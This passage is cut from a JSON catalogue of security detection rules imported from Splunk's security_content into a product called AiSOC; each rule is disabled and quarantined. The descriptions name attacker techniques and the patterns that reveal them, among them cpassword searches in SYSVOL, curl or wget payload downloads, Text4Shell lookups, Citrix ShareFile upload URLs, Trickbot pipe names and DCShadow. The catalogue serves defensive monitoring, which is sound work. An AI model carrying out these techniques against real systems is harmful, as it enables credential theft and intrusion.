Preferences (GPP). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving findstr.exe with references to SYSVOL and cpassword. This activity is significant because it indicates an attempt to locate and potentially decrypt embedded credentials in GPP, which could lead to unauthorized access. If confirmed malicious, this could allow an attacker to escalate privileges or gain access to sensitive systems and data within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-findstr-gpp-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1631ac2d-f2a9-42fa-8a59-d6e210d472f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_findstr_gpp_discovery.yml" } }, { "id": "splunk-security-content-1668812a-6047-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 Added Service Principal", "description": "The following analytic detects the addition of new service principal accounts in O365 tenants. It leverages data from the `o365_management_activity` dataset, specifically monitoring for operations related to adding or creating service principals. This activity is significant because attackers can exploit service principals to gain unauthorized access and perform malicious actions within an organization's environment. If confirmed malicious, this could allow attackers to interact with APIs, access resources, and execute operations on behalf of the organization, potentially leading to data breaches or further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-added-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1668812a-6047-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_added_service_principal.yml" } }, { "id": "splunk-security-content-16ae9076-d1d5-411c-8fdd-457504b33dac", "type": "detection", "name": "ASL AWS Detect Users creating keys with encrypt policy without MFA", "description": "The following analytic detects the creation of AWS KMS keys with an encryption policy accessible to everyone, including external entities. It leverages AWS CloudTrail logs from Amazon Security Lake to identify `CreateKey` or `PutKeyPolicy` events where the `kms:Encrypt` action is granted to all principals. This activity is significant as it may indicate a compromised account, allowing an attacker to misuse the encryption key to target other organizations. If confirmed malicious, this could lead to unauthorized data encryption, potentially disrupting operations and compromising sensitive information across multiple entities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-detect-users-creating-keys-with-encrypt-policy-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16ae9076-d1d5-411c-8fdd-457504b33dac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml" } }, { "id": "splunk-security-content-16eb11bc-ef42-42e8-9d0c-d21e0fa15725", "type": "detection", "name": "Windows New EventLog ChannelAccess Registry Value Set", "description": "The following analytic detects suspicious modifications to the EventLog security descriptor registry value for defense evasion. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"CustomSD\" value within the \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog\\\\CustomSD\" path. This activity is significant as changes to the access permissions of the event log could blind security products and help attackers evade defenses. If confirmed malicious, this could allow attackers to block users and security products from viewing, ingesting and interacting event logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-eventlog-channelaccess-registry-value-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "16eb11bc-ef42-42e8-9d0c-d21e0fa15725", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_eventlog_channelaccess_registry_value_set.yml" } }, { "id": "splunk-security-content-172c59f2-5fae-45e5-8e51-94445143e93f", "type": "detection", "name": "Citrix ShareFile Exploitation CVE-2023-24489", "description": "The following analytic detects potentially malicious file upload attempts to Citrix ShareFile via specific suspicious URLs and the HTTP POST method. It leverages the Web datamodel to identify URL patterns such as \"/documentum/upload.aspx?parentid=\", \"/documentum/upload.aspx?filename=\", and \"/documentum/upload.aspx?uploadId=*\", combined with the HTTP POST method. This activity is significant for a SOC as it may indicate an attempt to upload harmful scripts or content, potentially compromising the Documentum application. If confirmed malicious, this could lead to unauthorized access, data breaches, and operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-sharefile-exploitation-cve-2023-24489.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "172c59f2-5fae-45e5-8e51-94445143e93f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_sharefile_exploitation_cve_2023_24489.yml" } }, { "id": "splunk-security-content-173a1cb9-1814-4128-a9dc-f29dade89957", "type": "detection", "name": "Cisco Secure Firewall - Wget or Curl Download", "description": "The following analytic detects outbound connections initiated by command-line tools such as curl or wget. It leverages Cisco Secure Firewall Threat Defense logs and identifies allowed connections (action=Allow) where either the EVE_Process or ClientApplication fields indicate use of these utilities. While curl and wget are legitimate tools commonly used for software updates and scripting, adversaries often abuse them to download payloads, retrieve additional tools, or establish staging infrastructure from compromised systems. If confirmed malicious, this behavior may indicate the download phase of an attack chain or a command-and-control utility retrieval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003", "T1059", "T1071.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-wget-or-curl-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "173a1cb9-1814-4128-a9dc-f29dade89957", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___wget_or_curl_download.yml" } }, { "id": "splunk-security-content-175bb2de-6227-416b-9678-9b61999cd21f", "type": "detection", "name": "Windows Enable PowerShell Web Access", "description": "The following analytic detects the enabling of PowerShell Web Access via PowerShell commands. It leverages PowerShell script block logging (EventCode 4104) to identify the execution of the `Install-WindowsFeature` cmdlet with the `WindowsPowerShellWebAccess` parameter. This activity is significant because enabling PowerShell Web Access can facilitate remote execution of PowerShell commands, potentially allowing an attacker to gain unauthorized access to systems and networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-enable-powershell-web-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "175bb2de-6227-416b-9678-9b61999cd21f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_enable_powershell_web_access.yml" } }, { "id": "splunk-security-content-178d696d-6dc6-4ee8-9d25-93fee34eaf5b", "type": "detection", "name": "Azure Automation Runbook Created", "description": "The following analytic detects the creation of a new Azure Automation Runbook within an Azure tenant. It leverages Azure Audit events, specifically the Azure Activity log category, to identify when a new Runbook is created or updated. This activity is significant because adversaries with privileged access can use Runbooks to maintain persistence, escalate privileges, or execute malicious code. If confirmed malicious, this could lead to unauthorized actions such as creating Global Administrators, executing code on VMs, and compromising the entire Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-automation-runbook-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "178d696d-6dc6-4ee8-9d25-93fee34eaf5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_automation_runbook_created.yml" } }, { "id": "splunk-security-content-17cd75b2-8666-11eb-9ab4-acde48001122", "type": "detection", "name": "High Process Termination Frequency", "description": "The following analytic identifies a high frequency of process termination events on a computer within a short period. It leverages Sysmon EventCode 5 logs to detect instances where 15 or more processes are terminated within a 3-second window. This behavior is significant as it is commonly associated with ransomware attempting to avoid exceptions during file encryption. If confirmed malicious, this activity could indicate an active ransomware attack, potentially leading to widespread file encryption and significant data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-process-termination-frequency.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "17cd75b2-8666-11eb-9ab4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/high_process_termination_frequency.yml" } }, { "id": "splunk-security-content-17e9b764-3a2b-4d36-9751-32d13ce4718b", "type": "detection", "name": "Cisco Secure Firewall - Blocked Connection", "description": "The following analytic detects a blocked connection event by identifying a \"Block\" value in the action field. It leverages logs from Cisco Secure Firewall Threat Defense devices. This activity is significant as it can identify attempts from users or applications initiating network connection to explicitly or implicitly blocked range or zones. If confirmed malicious, attackers could be attempting to perform a forbidden action on the network such as data exfiltration, lateral movement, or network disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1046", "T1110", "T1203", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-blocked-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "17e9b764-3a2b-4d36-9751-32d13ce4718b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___blocked_connection.yml" } }, { "id": "splunk-security-content-17f8f69c-5d00-4c88-9c6f-493bbdef20a1", "type": "detection", "name": "Windows Parent PID Spoofing with Explorer", "description": "The following analytic identifies a suspicious `explorer.exe` process with the `/root` command-line parameter. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process and command-line data. The presence of `/root` in `explorer.exe` is significant as it may indicate parent process spoofing, a technique used by malware to evade detection. If confirmed malicious, this activity could allow an attacker to operate undetected, potentially leading to unauthorized access, privilege escalation, or persistent threats within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-parent-pid-spoofing-with-explorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "17f8f69c-5d00-4c88-9c6f-493bbdef20a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml" } }, { "id": "splunk-security-content-1804b0a4-a682-11eb-8f68-acde48001122", "type": "detection", "name": "Trickbot Named Pipe", "description": "The following analytic detects the creation or connection to a named pipe associated with Trickbot malware. It leverages Sysmon EventCodes 17 and 18 to identify named pipes with the pattern \"\\\\pipe\\\\*lacesomepipe\". This activity is significant as Trickbot uses named pipes for communication with its command and control (C2) servers, facilitating data exfiltration and command execution. If confirmed malicious, this behavior could allow attackers to maintain persistence, execute arbitrary commands, and exfiltrate sensitive information from the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/trickbot-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1804b0a4-a682-11eb-8f68-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/trickbot_named_pipe.yml" } }, { "id": "splunk-security-content-182ba99f-2dde-4cdb-8e5c-e3b1e251cb10", "type": "detection", "name": "Windows SQL Server Extended Procedure DLL Loading Hunt", "description": "This analytic detects when SQL Server loads DLLs to execute extended stored procedures. This is particularly important for security monitoring as it indicates the first-time use or version changes of potentially dangerous procedures like xp_cmdshell, sp_OACreate, and others. While this is a legitimate operation, adversaries may abuse these procedures for execution, discovery, or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001", "T1059.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-extended-procedure-dll-loading-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "182ba99f-2dde-4cdb-8e5c-e3b1e251cb10", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_extended_procedure_dll_loading_hunt.yml" } }, { "id": "splunk-security-content-187bf937-c436-4c65-bbcb-7539ffe02da1", "type": "detection", "name": "Windows AD Privileged Group Modification", "description": "This detection identifies when users are added to privileged Active Directory\ngroups by leveraging the Windows Security Event Code 4728 along with a lookup\nof privileged AD groups provided by Splunk Enterprise Security.\nAttackers often add user accounts to privileged AD groups to escalate privileges\nor maintain persistence within an Active Directory environment.\nMonitoring for modifications to privileged groups can help identify potential security breaches\nand unauthorized access attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-privileged-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "187bf937-c436-4c65-bbcb-7539ffe02da1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_privileged_group_modification.yml" } }, { "id": "splunk-security-content-18916468-9c04-11ec-bdc6-acde48001122", "type": "detection", "name": "Kerberos TGT Request Using RC4 Encryption", "description": "The following analytic detects a Kerberos Ticket Granting Ticket (TGT) request using RC4-HMAC encryption (type 0x17) by leveraging Event 4768. This encryption type is outdated and its presence may indicate an OverPass The Hash attack. Monitoring this activity is crucial as it can signify credential theft, allowing adversaries to authenticate to the Kerberos Distribution Center (KDC) using a stolen NTLM hash. If confirmed malicious, this could enable unauthorized access to systems and resources, potentially leading to lateral movement and further compromise within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-tgt-request-using-rc4-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "18916468-9c04-11ec-bdc6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_tgt_request_using_rc4_encryption.yml" } }, { "id": "splunk-security-content-18b5a1a0-6326-11ec-943a-acde48001122", "type": "detection", "name": "Linux Insert Kernel Module Using Insmod Utility", "description": "The following analytic detects the insertion of a Linux kernel module using the insmod utility. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process names and command-line details. This activity is significant as it may indicate the installation of a rootkit or malicious kernel module, potentially allowing an attacker to gain elevated privileges and bypass security detections. If confirmed malicious, this could lead to unauthorized code execution, persistent access, and severe compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-insert-kernel-module-using-insmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "18b5a1a0-6326-11ec-943a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_insert_kernel_module_using_insmod_utility.yml" } }, { "id": "splunk-security-content-18f0d27d-569e-4bc4-96e1-09b214fa73c0", "type": "detection", "name": "Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download", "description": "This analytic detects suspicious use of `rundll32.exe` in combination with `mshtml.dll` and the export `RunHTMLApplication`.\nThis behavior is often observed in malware to execute JavaScript or VBScript in memory, enabling payload staging or\nbypassing script execution policies and bypassing the usage of the \"mshta.exe\" binary.\nThe detection leverages Cisco Network Visibility Module telemetry which offers network flow activity\nalong with process information such as command-line arguments\nIf confirmed malicious, this activity may indicate initial access or payload download.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-rundll32-abuse-of-mshtml-dll-for-payload-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "18f0d27d-569e-4bc4-96e1-09b214fa73c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___rundll32_abuse_of_mshtml_dll_for_payload_download.yml" } }, { "id": "splunk-security-content-193769d3-1e33-43a9-970e-ad4a88256cdb", "type": "detection", "name": "Windows AD Short Lived Server Object", "description": "The following analytic identifies the creation and quick deletion of a Domain Controller (DC) object within 30 seconds in an Active Directory environment, indicative of a potential DCShadow attack. This detection leverages Windows Security Event Codes 5137 and 5141, analyzing the duration between these events. This activity is significant as DCShadow allows attackers with privileged access to register a rogue DC, enabling unauthorized changes to AD objects, including credentials. If confirmed malicious, this could lead to unauthorized AD modifications, compromising the integrity and security of the entire domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-short-lived-server-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "193769d3-1e33-43a9-970e-ad4a88256cdb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_short_lived_server_object.yml" } }, { "id": "splunk-security-content-196ff536-58d9-4d1b-9686-b176b04e430b", "type": "detection", "name": "Windows Service Stop By Deletion", "description": "The following analytic detects the use of `sc.exe` to delete a Windows service. It leverages Endpoint Detection and Response (EDR) data, focusing on process execution logs that capture command-line arguments. This activity is significant because adversaries often delete services to disable security mechanisms or critical system functions, aiding in evasion and persistence. If confirmed malicious, this action could lead to the termination of essential security services, allowing attackers to operate undetected and potentially escalate their privileges or maintain long-term access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-stop-by-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "196ff536-58d9-4d1b-9686-b176b04e430b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_stop_by_deletion.yml" } }, { "id": "splunk-security-content-1984f997-3b49-4d4b-a7e9-dc5dbf88370e", "type": "detection", "name": "Cisco NVM - Webserver Download From File Sharing Website", "description": "This analytic detects unexpected outbound network connections initiated by known webserver processes such as `httpd.exe`, `nginx.exe`, or `tomcat.exe` to common file sharing or public content hosting services like GitHub, Discord CDN, Transfer.sh, or Pastebin.\nWebservers are rarely expected to perform outbound downloads, especially to dynamic or anonymous file hosting domains. This behavior is often associated with server compromise,\nwhere an attacker uses a reverse shell, webshell, or injected task to fetch malware or tools post-exploitation.\nThe detection leverages Cisco Network Visibility Module flow data, enriched with process context, to identify this highly suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-webserver-download-from-file-sharing-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1984f997-3b49-4d4b-a7e9-dc5dbf88370e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___webserver_download_from_file_sharing_website.yml" } }, { "id": "splunk-security-content-19a481e0-c97c-4d14-b1db-75a708eb592e", "type": "detection", "name": "Exploit Public Facing Application via Apache Commons Text", "description": "The following analytic detects attempts to exploit the CVE-2022-42889 vulnerability in the Apache Commons Text Library, known as Text4Shell. It leverages the Web datamodel to identify suspicious HTTP requests containing specific lookup keys (url, dns, script) that can lead to Remote Code Execution (RCE). This activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary code on the server. If confirmed malicious, this could lead to full system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exploit-public-facing-application-via-apache-commons-text.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "19a481e0-c97c-4d14-b1db-75a708eb592e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/exploit_public_facing_application_via_apache_commons_text.yml" } }, { "id": "splunk-security-content-19b53215-4a16-405b-8087-9e6acf619842", "type": "detection", "name": "GCP Kubernetes cluster pod scan detection", "description": "The following analytic identifies unauthenticated requests to Kubernetes cluster pods. It detects this activity by analyzing GCP Pub/Sub messages for audit logs where the response status code is 401, indicating unauthorized access attempts. This activity is significant for a SOC because it may indicate reconnaissance or scanning attempts by an attacker trying to identify vulnerable pods. If confirmed malicious, this activity could lead to unauthorized access, allowing the attacker to exploit vulnerabilities within the cluster, potentially compromising sensitive data or gaining control over the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-kubernetes-cluster-pod-scan-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "19b53215-4a16-405b-8087-9e6acf619842", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_kubernetes_cluster_pod_scan_detection.yml" } }, { "id": "splunk-security-content-19ec30ad-faa2-496a-a6a9-f2e5f778fbdb", "type": "detection", "name": "Ollama Abnormal Network Connectivity", "description": "Detects abnormal network activity and connectivity issues in Ollama including non-localhost API access attempts and warning-level network errors such as DNS lookup failures, TCP connection issues, or host resolution problems that may indicate network-based attacks, unauthorized access attempts, or infrastructure reconnaissance activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-abnormal-network-connectivity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "19ec30ad-faa2-496a-a6a9-f2e5f778fbdb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_abnormal_network_connectivity.yml" } }, { "id": "splunk-security-content-1a058296-7c68-4d66-9560-464764d6e26c", "type": "detection", "name": "Windows RDP Server Registry Deletion", "description": "This detection identifies the deletion of registry keys under HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\, which store records of previously connected remote systems via Remote Desktop Protocol (RDP). These keys are created automatically when a user connects to a remote host using the native Windows RDP client (mstsc.exe) and can be valuable forensic artifacts for tracking remote access activity. Malicious actors aware of this behavior may delete these keys after using RDP to hide evidence of their activity and avoid detection during incident response. This form of artifact cleanup is a known defense evasion technique, often performed during or after lateral movement. Legitimate users rarely delete these keys manually, making such actions highly suspicious\u2014especially when correlated with RDP usage, unusual logon behavior, or other signs of compromise. Detecting the deletion of these registry entries can provide crucial insight into attempts to cover tracks following interactive remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-server-registry-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1a058296-7c68-4d66-9560-464764d6e26c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_server_registry_deletion.yml" } }, { "id": "splunk-security-content-1a06689d-814e-4db2-b2c7-5a174f8c2d6d", "type": "detection", "name": "Windows MSIX Package Interaction", "description": 